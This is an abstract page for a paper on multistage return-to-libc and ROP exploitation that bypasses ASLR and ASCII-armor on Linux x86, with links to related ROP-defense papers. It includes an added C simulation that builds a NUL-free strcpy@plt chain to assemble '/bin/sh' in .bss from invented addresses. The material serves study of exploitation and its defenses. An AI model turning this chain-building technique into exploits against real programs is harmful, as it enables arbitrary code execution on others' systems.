Payload Already Inside: Data Reuse for ROP Exploits
Not recorded
Abstract
Return-oriented programming (ROP), which builds on the return-to-libc and borrowed-code-chunks techniques, is one of the most discussed advanced exploitation techniques for bypassing non-executable memory (NX). Several practical works have used ROP on Windows and iPhone OS to bypass DEP and code signing. On most modern Linux distributions, ASCII-armor address mapping (which maps libc to addresses whose most significant byte is NULL, so that they cannot be delivered by a string-copy overflow) and Address Space Layout Randomization (ASLR) are enabled by default to protect against return-to-libc and ROP techniques. In this paper, we show how to extend older advanced return-to-libc techniques into multistage techniques that bypass ASLR and ASCII-armor mapping and make ROP and return-to-libc exploitation on modern Linux x86 easy. In addition, by reusing not only code but also data from the binary itself, we can build arbitrary chained return-to-libc or ROP calls that bypass ASLR.
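The data-reuse idea in the abstract, reduced to a runnable simulation (an added example, not code from the paper): on a non-PIE x86 binary the image, its PLT stubs and its .bss stay at fixed addresses even under ASLR, so an attacker can chain strcpy@plt calls that copy single bytes already present in the binary into .bss and assemble a string such as "/bin/sh" that the binary never contained. The byte image, the addresses assumed for strcpy@plt, the pop-pop-ret gadget and the .bss slot are all invented; the frame layout (callee, pop-pop-ret, two arguments) is the usual x86 chained return-to-libc convention. The chain is also checked for NULL bytes, which is exactly the property ASCII-armor relies on to keep libc addresses out of string-copied payloads.

```c
/* Added example, not code from the paper: build a string in a fixed-address
 * .bss by chaining strcpy@plt calls whose source bytes already exist inside
 * a non-PIE x86 binary.  Every address below and the "binary image" itself
 * are invented for the demonstration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMAGE_BASE 0x08048000u  /* assumed non-PIE load address (not randomized) */
#define STRCPY_PLT 0x08048330u  /* assumed address of strcpy@plt in the binary  */
#define POP2_RET   0x08048665u  /* assumed "pop ebx; pop ebp; ret" gadget       */
#define BSS_ADDR   0x0804a0c0u  /* assumed writable, fixed .bss destination     */
#define BSS_SIZE   64

/* Constructed stand-in for the binary's bytes: a little code, then strings the
 * program legitimately contains.  "/bin/sh" appears nowhere in it. */
static const unsigned char image[] =
    "\x55\x89\xe5\x83\xec\x10\xc3"      /* push ebp; mov ebp,esp; sub esp,0x10; ret */
    "\0Usage: %s <file>\0"
    "/tmp/log\0"
    "bash\0"
    "not found\0";
#define IMAGE_SIZE ((uint32_t)sizeof(image))

/* One x86 chained ret2libc frame: callee, the address it returns to (a
 * pop-pop-ret that discards the two arguments), then the two arguments. */
typedef struct { uint32_t func, ret, dst, src; } frame_t;

/* True if any of the four bytes of the address is 0x00. */
static int addr_has_nul(uint32_t a) {
    return !(a & 0xffu) || !(a & 0xff00u) || !(a & 0xff0000u) || !(a & 0xff000000u);
}

/* Find byte b inside the image at an address that itself contains no NUL,
 * because a strcpy-delivered payload cannot carry 0x00. */
static int find_byte(unsigned char b, uint32_t *addr) {
    for (uint32_t off = 0; off < IMAGE_SIZE; off++) {
        if (image[off] == b && !addr_has_nul(IMAGE_BASE + off)) {
            *addr = IMAGE_BASE + off;
            return 1;
        }
    }
    return 0;
}

/* Emit one strcpy frame per byte of target (terminating NUL included).
 * strcpy copies the whole run up to the next NUL; the surplus is overwritten
 * by the following frame, and the last frame copies a lone NUL to terminate.
 * Returns the number of frames, or -1 if a byte is not in the image. */
int build_chain(const char *target, frame_t *out, int max) {
    int n = (int)strlen(target) + 1;
    if (n > max) return -1;
    for (int i = 0; i < n; i++) {
        uint32_t src;
        if (!find_byte((unsigned char)target[i], &src)) return -1;
        out[i].func = STRCPY_PLT;
        out[i].ret  = POP2_RET;
        out[i].dst  = BSS_ADDR + (uint32_t)i;
        out[i].src  = src;
    }
    return n;
}

/* The ASCII-armor check: every dword in the chain must be free of 0x00. */
int chain_is_nul_free(const frame_t *c, int n) {
    for (int i = 0; i < n; i++)
        if (addr_has_nul(c[i].func) || addr_has_nul(c[i].ret) ||
            addr_has_nul(c[i].dst)  || addr_has_nul(c[i].src))
            return 0;
    return 1;
}

/* Interpret the chain the way the CPU would after the overflow: each
 * strcpy(dst, src) reads from the image and writes into the simulated .bss. */
int run_chain(const frame_t *c, int n, unsigned char *bss, size_t bss_len) {
    for (int i = 0; i < n; i++) {
        if (c[i].func != STRCPY_PLT || c[i].ret != POP2_RET) return -1;
        if (c[i].src < IMAGE_BASE || c[i].src >= IMAGE_BASE + IMAGE_SIZE) return -1;
        if (c[i].dst < BSS_ADDR   || c[i].dst >= BSS_ADDR + bss_len) return -1;
        const unsigned char *s = image + (c[i].src - IMAGE_BASE);
        size_t len  = strlen((const char *)s);   /* the image ends in a NUL */
        size_t doff = c[i].dst - BSS_ADDR;
        if (doff + len + 1 > bss_len) return -1;
        memcpy(bss + doff, s, len + 1);
    }
    return 0;
}

/* Builds, checks and runs a chain for target; 1 if .bss ends up holding it. */
int demo_ok(const char *target) {
    frame_t chain[32];
    unsigned char bss[BSS_SIZE] = {0};
    int n = build_chain(target, chain, 32);
    if (n < 0 || !chain_is_nul_free(chain, n)) return 0;
    if (run_chain(chain, n, bss, sizeof bss) != 0) return 0;
    return strcmp((const char *)bss, target) == 0;
}

int main(void) {
    frame_t chain[32];
    int n = build_chain("/bin/sh", chain, 32);
    for (int i = 0; i < n; i++) {
        unsigned char b = image[chain[i].src - IMAGE_BASE];
        printf("strcpy@plt %08x | pop2ret %08x | dst %08x | src %08x ('%c')\n",
               (unsigned)chain[i].func, (unsigned)chain[i].ret,
               (unsigned)chain[i].dst, (unsigned)chain[i].src, b ? b : '0');
    }
    printf("demo_ok(\"/bin/sh\") = %d\n", demo_ok("/bin/sh"));
    return 0;
}
```

The chain only assembles argument data at a known address; handing that address to a libc function still needs a libc address, which is the multistage part the abstract refers to and is not simulated here. A target containing a byte the binary never holds (for example '-') cannot be built, which is why real exploits widen the search to every mapped, non-randomized region of the binary.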
Similar references
kBouncer: Efficient and Transparent ROP Mitigation
The wide adoption of non-executable page protections in recent versions of popular operating systems has given rise to attacks that employ return-oriented programming (ROP) to achieve arbitrary code execution without the injection of any code. Existing defenses against ROP exploits either require source code or symbolic debugging information, impose a significant runtime overhead, which limits ...
Defeating Zombie Gadgets by Re-randomizing Code upon Disclosure
Over the past few years, return-oriented programming (ROP) attacks have emerged as a prominent strategy for hijacking control of software. The full power and flexibility of ROP attacks was recently demonstrated using just-in-time ROP tactics (JIT-ROP), whereby an adversary repeatedly leverages a memory disclosure vulnerability to identify useful instruction sequences and compile them into a func...
Aggrandizing the beast's limbs: patulous code reuse attack on ARM architecture
Since smartphones are usually personal devices full of private information, they are a popular target for a vast variety of real-world attacks such as Code Reuse Attack (CRA). CRAs enable attackers to execute any arbitrary algorithm on a device without injecting an executable code. Since the standard platform for mobile devices is ARM architecture, we concentrate on available ARM-based CRAs. Cu...
Chronomorphic Programs: Using Runtime Diversity to Prevent Code Reuse Attacks
Return Oriented Programming (ROP) attacks, in which a cyber attacker crafts an exploit from instruction sequences already contained in a running binary, have become popular and practical. While previous research has investigated software diversity and dynamic binary instrumentation for defending against ROP, many of these approaches incur large performance costs or are susceptible to Blind ROP ...
Learning how to prevent return-oriented programming efficiently
The discovery of recent zero-day exploits against Microsoft Word, Adobe Flash Player and Internet Explorer demonstrates that return-oriented programming (ROP) is the most severe threat to software system security. Microsoft's 2013 Software Vulnerability Exploitation trend report found that 73% of all vulnerabilities are exploited via ROP. The core idea of ROP is to exploit the presence of so-cal...